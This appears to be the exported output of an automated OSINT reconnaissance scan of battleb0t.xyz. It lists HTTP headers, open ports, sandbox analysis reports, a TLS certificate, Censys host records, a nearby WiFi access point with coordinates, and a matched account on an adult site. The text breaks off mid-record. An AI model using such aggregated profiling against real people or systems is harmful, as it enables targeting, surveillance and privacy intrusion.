| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-cache-status: REVALIDATED | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 02:47:46 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 34.74.170.74:443 | 34.74.170.74 |
| 2023-05-12 02:44:24 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Open Graph | oldfluid.battleb0t.xyz |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.154): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.15:80 | 188.114.96.0/24 |
| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | support@bigmarker.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bigmarker.com/taxadmin/The-Inbound-Customer-Experience?bmid=5673cc9137db&bmid_type=member', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:1480:304:WilStaging_02"\n "SM0:1480:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:1480:120:WilError_01"\n "Local\\SM0:1480:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.235.65.215:443"\n "138.91.254.96:443"\n "13.227.21.136:443"\n "13.227.21.58:443"\n "13.227.74.64:443"\n "185.199.108.153:443"\n "74.125.137.157:443"\n "142.250.191.68:443"\n "151.101.2.137:443"\n "162.247.243.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': 
u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a 
variety of questions including:" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: 
wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\autofill\\3.0.0.3\\edge_autofill_global_block_list.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\login data"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', 
u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\sync data\\leveldb\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\7c516a82-27f5-4723-be57-30a8336c14b5.tmp"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\service worker\\database\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: 
[%TEMP%\\6236_1468670677\\shopping.js]- [targetUID: 00000000-00006236]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00001308]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir6236_1265273683\\Ruleset Data]- [targetUID: 00000000-0000623 |
| 2023-05-12 02:48:12 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://angular-ui.github.io/ui-router/release/angular-ui-router.min.js', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6920:304:WilStaging_02"\n "SM0:6920:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6920:304:WilStaging_02"\n "Local\\SM0:6920:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"angular-ui.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: 
wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file 
"c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\visited links"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00002648]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.32\\Ruleset Data]- [targetUID: 00000000-00005644]\n "wallet-stable.json" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Wallet\\112.15267.15264.1\\json\\wallet\\wallet-stable.json]- [targetUID: 00000000-00005644]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00005644]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\5644_303687537\\wallet.bundle.js]- [targetUID: 00000000-00005644]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\5644_1498271732\\Filtering Rules]- [targetUID: 00000000-00005644]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00002648]\n "wallet-drawer.bundle.js" has type "UTF-8 
Unicode text with very long lines"- [targetUID: N/A]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\5644_303687537\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00005644]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\5644_303687537\\Mini-Wallet\\miniwallet.bundle.js]- [targetUID: 00000000-00005644]\n "notification.bundle.js" has type "ASCII text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Wallet\\112.15267.15264.1\\Notification\\notification.bundle.js]- [targetUID: 00000000-00005644]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00005644]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\5644_1498271732\\Filtering Rules-AA]- [targetUID: 00000000-00005644]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00005644]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.3\\edge_autofill_field_data.json]- [targetUID: 00000000-00005644]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00005644]\n "wallet-checkout-eligible-sites.json" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Wallet\\112.15267.15264.1\\json\\wallet\\wallet-checkout-eligible-sites.json]- [targetUID: 00000000-00005644]\n "wallet-checkout-eligible-sites-pre-stable.json" has type "ASCII text"- Location: 
[%TEMP%\\5644_303687537\\json\\wallet\\wallet-checkout-eligible-sites-pre-stable.json]- [targetUID: 00000000-00005644]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00005644]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00005644]\n "safety_tips.pb" has typ | 185.199.110.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | EPORNER (Category: XXXPORNXXX)
https://www.eporner.com/profile/login/ | login |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:cd:b7:3c:d6:71:f3:4f:d0:0b:1c:3a:89:f9:32:41:9b:99
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:22:44 2022 GMT
Not After : Feb 15 13:22:43 2023 GMT
Subject: CN=www.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
57:48:2A:D8:70:70:AC:E4:0A:F6:8C:02:EF:80:5A:28:2D:B1:3C:AE
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 14:22:44.733 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 14:22:44.759 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:90:53:D7) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:55:21 | Raw Data from RIRs | No | Censys | 13 | 0 | 3 | 0 | None | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:31.907335501Z"}, 
"www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:11.528325040Z"}, 
